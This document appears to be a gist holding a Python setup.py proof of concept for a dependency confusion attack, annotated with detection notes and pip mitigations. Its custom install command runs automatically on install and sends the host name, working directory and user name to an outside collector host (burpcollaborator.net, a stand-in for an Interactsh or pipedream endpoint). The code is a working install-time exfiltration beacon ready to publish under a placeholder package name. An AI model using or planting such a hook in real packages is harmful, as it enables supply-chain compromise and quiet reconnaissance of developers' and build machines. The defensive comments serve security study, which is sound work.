Created
May 15, 2022 22:55
dependency confusion python
from setuptools import setup | |
from setuptools.command.install import install | |
import requests | |
import socket | |
import getpass | |
import os | |
class CustomInstall(install):
    """Install command that reports host details to a remote endpoint.

    After the standard setuptools install step has run, this command
    collects the machine's host name, the current working directory and
    the current user name, and sends them as query-string parameters in a
    single HTTPS GET request.

    Review notes (defensive):
      * The tell-tale pattern in a source distribution is a ``cmdclass``
        override in ``setup.py`` whose ``run()`` performs network I/O.
      * On the wire this appears as an outbound request from the
        installer/build process carrying ``hostname``, ``cwd`` and
        ``username`` parameters; egress filtering and logging on build
        hosts make it visible.
    """

    def run(self):
        # Let the regular install proceed first; the callback below only
        # runs once install.run() has returned without raising.
        install.run(self)

        # Values are read in the same order they are sent: host name,
        # working directory, then the account running the install.
        beacon = {
            'hostname': socket.gethostname(),
            'cwd': os.getcwd(),
            'username': getpass.getuser(),
        }

        # The host is the gist's placeholder; the author notes it is meant
        # to be replaced with an Interactsh or pipedream endpoint.
        requests.get("https://burpcollaborator.net", params=beacon)
# Package metadata. The cmdclass entry is the security-relevant part: it
# swaps the stock `install` command for CustomInstall, so that class's
# run() executes whenever setuptools runs the install command for this
# source distribution.
#
# Mitigations on the consuming side: resolve internal package names from a
# single index (`--index-url`, not `--extra-index-url`), pin with
# `--require-hashes`, and prefer `--only-binary :all:` so that setup.py
# from an sdist is not executed.
setup(
    name='dependency1337',  # package name (placeholder in the gist)
    version='1.0.0',
    description='test',
    author='test',
    license='MIT',
    zip_safe=False,
    cmdclass=dict(install=CustomInstall),
)